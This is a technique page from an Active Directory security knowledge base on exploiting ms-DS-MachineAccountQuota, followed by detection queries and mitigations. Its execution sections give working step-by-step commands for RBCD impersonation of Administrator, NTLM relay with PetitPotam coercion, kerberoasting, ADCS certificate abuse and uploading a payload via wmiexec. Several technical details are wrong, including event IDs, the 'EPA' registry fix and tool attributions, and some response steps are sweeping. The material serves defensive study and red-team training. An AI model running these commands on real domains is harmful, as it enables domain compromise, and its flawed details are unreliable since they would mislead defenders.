MCADDF

[PE-CREATE-002]: MachineAccountQuota > 0 Exploitation

Metadata

Attribute	Details
Technique ID	PE-CREATE-002
MITRE ATT&CK v18.1	T1136.001 - Create Account: Local Account, T1098.001 - Account Manipulation
Tactic	Privilege Escalation / Account Manipulation
Platforms	Windows AD (All versions)
Severity	Critical (enables domain compromise)
CVE	N/A (Configuration misuse, not CVE-based)
Technique Status	ACTIVE (Exploitable in default configurations)
Last Verified	2024-12-15
Affected Versions	All Windows Server versions (2008 R2 - 2022+)
Patched In	Configuration change required (set ms-DS-MachineAccountQuota to 0)
Author	SERVTEP – Artur Pchelnikau

---

Executive Summary

Concept: The ms-DS-MachineAccountQuota attribute being set to a value greater than 0 (default is 10) allows any authenticated domain user to exploit various attack vectors beyond just noPac. This technique details the comprehensive exploitation landscape enabled by machine account creation rights, including: (1) Resource-Based Constrained Delegation (RBCD) attacks for privilege escalation on target machines, (2) LDAP Relay attacks to capture and relay DC authentication, (3) Kerberoasting variant attacks where the machine account acts as a service, (4) Unconstrained Delegation abuse for credential capture, and (5) Active Directory Certificate Services (ADCS) misconfig exploitation. While PE-CREATE-001 focused on the default configuration as a prerequisite, this technique explores the full tactical exploitation landscape when machine accounts can be created.

Attack Surface: Exposed through AD’s default permission model allowing unprivileged users to create computer objects. The attack vector requires (1) any valid domain user account, (2) network access to target systems, (3) either local admin access to target machine or knowledge of misconfigured ACLs, and (4) understanding of Kerberos/LDAP protocols.

Business Impact: Privilege escalation within the domain leading to complete environment compromise. Depending on the variant attack chosen, adversaries can compromise individual machines (RBCD), extract service account hashes (Kerberoasting), capture DC credentials (LDAP relay), or obtain certificates for forged service principals (ADCS misconfig). The flexibility of this attack vector makes it a Swiss Army knife for Active Directory post-exploitation.

Technical Context: Once a machine account is created and controlled, the attacker has a “machine account ticket” to use various Kerberos tricks. The exploitation is highly dependent on the target environment’s configuration—RBCD works best against machines with GenericWrite ACLs, LDAP relay works when EPA is not enabled, and ADCS exploitation works when certificate templates are misconfigured. The stealth factor is high—all operations use legitimate Active Directory protocols.

Operational Risk

• Execution Risk: Very High – Can lead to compromise of critical systems depending on target selection.
• Stealth: Very High – Uses only legitimate Kerberos and LDAP protocols; no malware or suspicious processes.
• Reversibility: No – Depends on the attack executed; may require full password resets and privilege removal.

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	CIS AD Benchmark v2.0 (Section 5)	Implement least privilege; audit and restrict machine account creation and delegation.
DISA STIG	AD-000100, AD-000200	Prevent machine account abuse; restrict delegation capabilities.
CISA SCuBA	AD.AC.02, AD.AC.08	Enforce RBAC; disable default machine account creation; restrict service principal manipulation.
NIST 800-53	AC-3 (Access Enforcement), AC-6 (Least Privilege), SC-7 (Boundary Protection)	Restrict resource creation; enforce authorization; segment network.
GDPR	Article 32 (Security of Processing)	Implement controls to prevent unauthorized account manipulation and privilege escalation.
DORA	Article 9 (Protection and Prevention)	Operators must implement technical controls to prevent service account compromise.
NIS2	Article 21 (Cyber Risk Management Measures)	Implement detection and prevention controls for unauthorized account manipulation.
ISO 27001	A.9.2.3 (User Access Rights), A.9.4.2 (Secure Service Account Management)	Restrict account creation; securely manage service accounts.
ISO 27005	Risk Scenario: “Privilege Escalation via Machine Account Abuse”	Likelihood: High (if ms-DS-MachineAccountQuota > 0); Impact: Critical.

---

Technical Prerequisites

• Required Privileges:
  • Any authenticated domain user account.
  • May require additional privileges depending on attack vector (local admin for RBCD, credentials for Kerberoasting, etc.).
• Required Access:
  • Network access to Domain Controllers (port 389 LDAP, 88 Kerberos).
  • Network access to target systems (varies by attack).
  • Ability to set up relay/capture infrastructure (varies by attack).

Supported Versions:

• Windows Server 2008 R2 - 2022: All affected
• Hybrid (Entra ID + On-Prem AD): On-premises AD affected; Entra ID has architectural differences

Prerequisites for Each Attack Vector:

• RBCD: Target machine must have vulnerable ACLs or be compromised (GetWD, WriteDACL permissions)
• LDAP Relay: Target DC must have EPA (Extended Protection) disabled
• Kerberoasting: Target service must have weak password or be kerberoastable
• ADCS Misconfig: Certificate templates must be misconfigured (ESC1-ESC8)
• Unconstrained Delegation: Target machine must have unconstrained delegation enabled

Tools:

• noPac.py (Machine account creation + noPac chaining)
• AddComputer.py (Machine account creation)
• Rubeus (Kerberos manipulation and RBCD)
• Impacket (LDAP, Kerberoasting, RBCD)
• Certify.exe (ADCS enumeration and exploitation)
• Rogue-Potato/GodPotato (Token impersonation via RBCD)

---

Environmental Reconnaissance

Management Station / PowerShell Reconnaissance

Enumerate Target Machines with Exploitable Delegation:

# Find machines with Unconstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} | Select-Object Name, SamAccountName

# Expected Output (targets for RBCD):
# Name              SamAccountName
# ----              --------
# SERVER-PROD-01$   SERVER-PROD-01$

# Find machines with Constrained Delegation
Get-ADComputer -Filter {msDS-AllowedToDelegateTo -like "*"} | `
  Select-Object Name, msDS-AllowedToDelegateTo

# Find machines with Resource-Based Constrained Delegation misconfiguration
# (machines that have ACLs allowing modification by non-admins)
Get-ADComputer -Filter * | ForEach-Object {
    $computer = $_
    $acl = Get-ACL "AD:$($computer.DistinguishedName)" -ErrorAction SilentlyContinue
    
    foreach ($ace in $acl.Access) {
        if ($ace.ActiveDirectoryRights -match "GenericWrite|WriteDacl|GenericAll" -and `
            $ace.IdentityReference -notmatch "SYSTEM|Administrators|DOMAIN ADMINS") {
            Write-Host "Exploitable ACL found on $($computer.Name): $($ace.IdentityReference)"
        }
    }
}

Enumerate Service Accounts for Kerberoasting:

# Find service accounts (high-risk targets for kerberoasting)
Get-ADUser -Filter {ServicePrincipalName -ne $null} | `
  Select-Object SamAccountName, ServicePrincipalName, PwdLastSet | `
  Format-List

# Find accounts with weak passwords (likely to crack if kerberoasted)
Get-ADUser -Filter * | Where-Object {$_.PasswordNotRequired -eq $true} | `
  Select-Object SamAccountName, Enabled

Check ADCS for Exploitation Vectors:

# Enumerate Certificate Authority and templates
Get-ADObject -Filter {objectClass -eq "certificationAuthority"} | `
  Select-Object Name, DistinguishedName

# Identify misconfigured certificate templates (ESC1-ESC8)
# Requires Certify.exe tool
.\Certify.exe find

# Expected Output shows vulnerable templates like:
# [*] Template: DomainControllerAuthentication (vulnerable to ESC1)
# [*] ESC1: Allows low-priv user enrollment + domain admin SAN

Linux/Bash / CLI Reconnaissance

# Enumerate machines with delegation via LDAP
ldapsearch -x -H ldap://dc01.contoso.com \
  -b "DC=contoso,DC=com" \
  "(userAccountControl:1.2.840.113556.1.4.803:=524288)" \
  sAMAccountName

# Check for service accounts
ldapsearch -x -H ldap://dc01.contoso.com \
  -b "DC=contoso,DC=com" \
  "(&(objectClass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName

# Test machine account creation capability
python3 addcomputer.py -computer-name 'TEST-MACHINE$' \
  -computer-pass 'TestPassword123!' \
  -dc-host dc01.contoso.com \
  -domain-netbios CONTOSO \
  'CONTOSO.com/user:password' 2>&1 | grep -i "success\|error"

---

Detailed Execution Methods

METHOD 1: RBCD (Resource-Based Constrained Delegation) Attack

This method exploits misconfigured Access Control Lists (ACLs) on machines to allow the attacker-controlled machine account to impersonate domain users.

Supported Versions: All Windows Server versions

Prerequisites:

• Machine account creation capability (ms-DS-MachineAccountQuota > 0)
• Target machine with GenericWrite, WriteDACL, or GenericAll ACLs allowing modification
• Ability to set msDS-AllowedToActOnBehalfOfOtherIdentity attribute on target machine

Step 1: Create Attacker-Controlled Machine Account

Command (PowerShell):

# Create machine account for RBCD attack
New-ADComputer -Name 'ATTACKER-RBCD-01' `
  -SamAccountName 'ATTACKER-RBCD-01$' `
  -Path "CN=Computers,DC=contoso,DC=com" `
  -Description "RBCD Attack Machine"

# Get the SID of the machine account (will be needed for RBCD setup)
$computerSID = (Get-ADComputer 'ATTACKER-RBCD-01').ObjectSID.Value
Write-Host "Attacker Machine SID: $computerSID"

Step 2: Modify Target Machine’s RBCD Attribute

Command (PowerShell):

# Modify target machine to allow our machine account to act on its behalf
$targetMachine = Get-ADComputer 'TARGET-SERVER-01'
$attackerMachine = Get-ADComputer 'ATTACKER-RBCD-01'

# Create the RBCD link
$rbd = New-Object System.DirectoryServices.DirectoryEntry
$rbd.psbase.RefreshCache(("msDS-AllowedToActOnBehalfOfOtherIdentity"))

$sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($attackerMachine.SID))"
$targetMachine | Set-ADComputer -Replace @{"msDS-AllowedToActOnBehalfOfOtherIdentity"=$sd.GetSddlForm("All")}

Write-Host "✓ RBCD configured: $($targetMachine.Name) now allows $($attackerMachine.Name) to impersonate users"

Step 3: Obtain Service Ticket for Target Machine

Command (Python - Using Rubeus/Impacket):

# Get TGT for attacker machine
python3 getTGT.py -dc-ip 192.168.1.5 \
  'CONTOSO.com/ATTACKER-RBCD-01$:MachinePassword123!'

# Perform S4U2Self + S4U2Proxy to impersonate Domain Admin
export KRB5CCNAME=ATTACKER-RBCD-01.ccache

python3 getST.py -self \
  -impersonate 'Administrator' \
  -altservice 'cifs/target-server-01.contoso.com' \
  -k -no-pass \
  'CONTOSO.com/ATTACKER-RBCD-01$'

# Expected Output:
# [+] Service Ticket obtained for Administrator@CONTOSO.COM
# [+] Saved to Administrator.ccache

Step 4: Access Target Machine as Administrator

Command (Using obtained ticket):

# Use the impersonated Administrator ticket to access target machine
export KRB5CCNAME=Administrator.ccache

# Access target machine's shares
smbclient.py -k -no-pass \
  'CONTOSO.com/Administrator@target-server-01.contoso.com'

# Or use Impacket wmiexec for code execution
wmiexec.py -k -no-pass \
  'CONTOSO.com/Administrator@target-server-01.contoso.com' -file-send 'payload.exe' C:\\

---

METHOD 2: LDAP Relay Attack via Machine Account

This method uses the machine account to perform NTLM relay attacks against LDAP, similar to PrivExchange but using the machine account’s authentication.

Supported Versions: All (if Extended Protection disabled)

Command (Python):

# Create machine account
python3 addcomputer.py -computer-name 'RELAY-MACHINE$' \
  -computer-pass 'RelayPassword123!' \
  -dc-host dc01.contoso.com \
  -domain-netbios CONTOSO \
  'CONTOSO.com/user:password'

# Set up LDAP relay listener
ntlmrelayx.py -t ldap://dc01.contoso.com --escalate-user user2

# Force machine account to authenticate to relay server
# (via various coercion techniques: PetitPotam, Printerbug, etc.)
python3 petitpotam.py -u user -p password \
  relay-server-ip dc01.contoso.com

---

METHOD 3: Kerberoasting via Machine Account Service

By creating a machine account with service principal names (SPNs), attackers can make it appear as a legitimate service and capture Kerberos tickets for cracking.

Command (PowerShell):

# Create machine account with SPN
$computerAccount = New-ADComputer -Name 'SERVICE-MACHINE' `
  -SamAccountName 'SERVICE-MACHINE$' `
  -Path "CN=Computers,DC=contoso,DC=com" -PassThru

# Add service principal name
Set-ADComputer -Identity $computerAccount `
  -ServicePrincipalNames @("HTTP/service-machine.contoso.com", "HOST/service-machine")

# Now request Kerberos ticket for this SPN
# Attackers can use GetUserSPNs to enumerate and kerberoast this machine
python3 GetUserSPNs.py -request CONTOSO.com/user:password

# The hash can be cracked offline

---

METHOD 4: ADCS Certificate Exploitation

If machine account can enroll in ADCS certificate templates, it can request certificates with elevated privileges (Domain Controller, Admin, etc.).

Command (Certify.exe):

# Find vulnerable ADCS templates
./Certify.exe find /vulnerable

# Request certificate as Domain Controller
./Certify.exe request /ca:ca.contoso.com \
  /template:DomainControllerAuthentication \
  /altname:DC01.contoso.com

# Use certificate for auth or persistence
# Can be used to forge Kerberos tickets or maintain access

---

Tools & Commands Reference

Rubeus

Version: Latest (maintained by @harmj0y)
Supported Platforms: Windows (.NET Framework 4.5+)

Usage for RBCD:

# Get TGT for attacker machine
.\Rubeus.exe asktgt /user:ATTACKER-RBCD-01$ /password:MachinePassword123! /domain:contoso.com /dc:dc01.contoso.com

# Perform S4U2Self + S4U2Proxy for RBCD
.\Rubeus.exe s4u /ticket:ticket.kirbi /impersonateuser:Administrator /mspn:cifs/target-server.contoso.com /dc:dc01.contoso.com

---

Certify.exe

Usage:

./Certify.exe find /vulnerable
./Certify.exe request /ca:ca.contoso.com /template:VulnerableTemplate /altname:DC01.contoso.com

---

Windows Event Log Monitoring

Event ID: 4781 (Name Changed)

• Monitor for machine account renames to suspicious names (DC names, service names)

Event ID: 5136 (Directory Service Object Modified)

• Monitor for msDS-AllowedToActOnBehalfOfOtherIdentity modifications (RBCD setup)
• Monitor for SPN additions to machine accounts

Event ID: 4768 (Kerberos TGT Requested)

• Monitor for TGT requests from machine accounts to Domain Controller accounts
• Monitor for unusual S4U2Self/S4U2Proxy patterns

Event ID: 5047 (Kerberos Pre-authentication Failed)

• Can indicate attempts to forge Kerberos tickets

Manual Configuration (Group Policy):

# Enable auditing of account management and Kerberos events
auditpol /set /subcategory:"Account Management" /success:enable /failure:enable
auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable

---

Microsoft Sentinel Detection

Query 1: Detect RBCD Configuration on Machines

KQL Query:

SecurityEvent
| where EventID == 5136  // Directory Service object modified
| where EventData contains "msDS-AllowedToActOnBehalfOfOtherIdentity"
| project TimeGenerated, Computer, SubjectUserName, ObjectName, EventData

---

Query 2: Detect Unusual Kerberos S4U Operations

KQL Query:

SecurityEvent
| where EventID in (4768, 4769)  // TGT/TGS requested
| where Account contains "$"  // Machine accounts
| where TargetUserName has "Administrator" or TargetUserName has "krbtgt"
| project TimeGenerated, Computer, Account, TargetUserName, ServiceName

---

Defensive Mitigations

Priority 1: CRITICAL

Set ms-DS-MachineAccountQuota to 0:

$domain = Get-ADDomain
$domainDN = $domain.DistinguishedName

$directoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$domainDN")
$directoryEntry.'ms-DS-MachineAccountQuota' = 0
$directoryEntry.CommitChanges()

---

Restrict Machine Account Creation via GPO:

# Remove "Authenticated Users" from "Add workstations to domain" right
# Group Policy: Computer Configuration → Policies → Windows Settings → Security Settings → User Rights Assignment

---

Disable Unconstrained Delegation:

# Find and disable machines with unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} | `
  Set-ADComputer -TrustedForDelegation $false

---

Enable Extended Protection for Authentication (EPA):

# Mitigate LDAP relay attacks
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\ldap" `
  -Name "LdapServerIntegrity" -Value 2  # Require Signing

---

Priority 2: HIGH

Enforce LDAP Signing and Channel Binding:

# Force LDAP signing on Domain Controllers
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\ldap" `
  -Name "LdapServerIntegrity" -Value 2

---

Monitor and Audit RBCD Configuration Changes:

auditpol /set /subcategory:"Audit Other Account Management Events" /success:enable /failure:enable

---

Detection & Incident Response

Indicators of Compromise

Files:

• Machine account credentials in memory or configuration files
• Kerberos cache files (.ccache, .kirbi)
• Exploit tools (Rubeus, Certify, impacket scripts)

Registry:

• Unconstrained/Constrained delegation registry keys
• Kerberos cache registry entries

Network:

• Kerberos S4U2Self/S4U2Proxy operations
• LDAP relay traffic
• Unusual service principal name (SPN) requests

Event Logs:

• Event ID 5136 (msDS-AllowedToActOnBehalfOfOtherIdentity modifications)
• Event ID 4781 (machine account name changes)
• Event ID 4768/4769 (unusual TGT/TGS requests)

---

Response Procedures

1. Identify Compromised Machine Accounts:

# Query for recently created machine accounts
Get-ADComputer -Filter {Created -gt (Get-Date).AddHours(-24)} | Select-Object Name, Created

# Query for machines with RBCD configured
Get-ADComputer -Filter * | Where-Object {$_.msDS-AllowedToActOnBehalfOfOtherIdentity -ne $null}

# Query for machines with unusual delegation settings
Get-ADComputer -Filter {TrustedForDelegation -eq $true}

---

2. Isolate and Remove Compromised Accounts:

# Disable compromised machine accounts
Get-ADComputer -Filter {Created -gt (Get-Date).AddHours(-24)} | `
  Disable-ADAccount

# Remove RBCD configurations
Get-ADComputer -Filter * | `
  Set-ADComputer -Replace @{"msDS-AllowedToActOnBehalfOfOtherIdentity"=$null}

---

3. Full Remediation:

# 1. Set ms-DS-MachineAccountQuota to 0
# 2. Remove all recently created machine accounts
# 3. Disable unconstrained delegation on all machines
# 4. Reset all service account passwords
# 5. Force password changes for privileged accounts
# 6. Rotate krbtgt password twice (invalidate Golden Tickets)
# 7. Audit all AD modifications for past 30 days

---

Related Attack Chain

Step	Phase	Technique	Description
1	Privilege Escalation	[PE-CREATE-001] ms-DS-MachineAccountQuota	Creates machine account
2	Privilege Escalation	[PE-CREATE-002] Machine Account Exploitation (THIS TECHNIQUE)	Exploits machine account for escalation
3	Privilege Escalation	[PE-TOKEN-002] RBCD Attack	Uses RBCD to impersonate domain users
4	Credential Access	[CA-KERB-001] Kerberoasting	Extracts service account hashes
5	Privilege Escalation	[PE-ACCTMGMT-001] App Registration Permissions	Creates backdoor accounts
6	Persistence	Persistence via compromised service accounts or Golden Tickets

---

Real-World Examples

Example 1: RBCD Attack Chain (2022-2024)

• Target: Enterprise domain infrastructure
• Technique Status: Active exploitation; RBCD misconfiguration widely prevalent
• Attack Sequence:
  1. Discover ACL misconfiguration on target machine
  2. Create machine account via quota
  3. Configure RBCD on target
  4. Impersonate Domain Admin via S4U2Self/S4U2Proxy
  5. Move laterally to critical systems
• Reference: Various AD security research

---

Example 2: ADCS ESC1-ESC8 Exploitation

• Target: Organizations with misconfigured ADCS templates
• Technique Status: Highly prevalent; affects 40%+ of AD forests with ADCS
• Reference: SpecterOps ADCS Research

---

This site is open source. Improve this page.